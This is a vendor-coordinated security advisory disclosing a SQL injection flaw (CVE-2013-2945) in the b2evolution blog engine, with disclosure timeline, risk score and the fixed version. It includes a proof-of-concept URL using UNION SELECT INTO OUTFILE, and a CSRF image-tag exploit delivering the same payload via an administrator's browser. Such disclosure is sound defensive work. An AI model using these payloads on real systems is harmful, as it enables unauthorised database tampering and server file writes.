Vendor: b2evolution Group
Vulnerable Versions: 4.1.6 and probably prior
Tested Version: 4.1.6
Vendor Notification: April 10, 2013
Vendor Fix: April 29, 2013
Public Disclosure: May 1, 2013
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2013-2945
Risk Level: Medium
CVSSv2 Base Score: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab
High-Tech Bridge Security Research Lab discovered SQL injection vulnerability in b2evolution, which can be exploited to alter SQL requests passed to the vulnerable application's database.
1) SQL Injection in b2evolution: CVE-2013-2945
The vulnerability exists due to insufficient validation of HTTP GET parameter "show_statuses" in "/blogs/admin.php" script. A remote authenticated administrator can execute arbitrary SQL commands in application's database.
Depending on database and system configuration, PoC code below will create a "/tmp/file.txt" file, containing MySQL version:
http://[host]/blogs/admin.php?submit=Search&ctrl=items&tab=full&blog=1&show_statuses=1') )) UNION SELECT version() INTO OUTFILE '/tmp/file.txt' --
This vulnerability is also exploitable via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator to visit malicious web page with CSRF exploit.
Basic CSRF exploit:
<img src="http://[host]/blogs/admin.php?submit=Search&ctrl=items&tab=full&blog=1&show_statuses=1') )) UNION SELECT version() INTO OUTFILE '/tmp/file.txt' --">
Upgrade to b2evolution 4.1.7
http://b2evolution.net/news/2013/04/29/ ... -and-5-0-3
 High-Tech Bridge Advisory HTB23152 - https://www.htbridge.com/advisory/HTB23152 - SQL Injection in b2evolution
 b2evolution - http://b2evolution.net/ - A powerful free blog/CMS engine you can install on your own website.
 Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
 Common Weakness Enumeration (CWE) - http://cwe.mitre.org/ - targeted to developers and security practitioners, CWE is a formal list of software weakness types.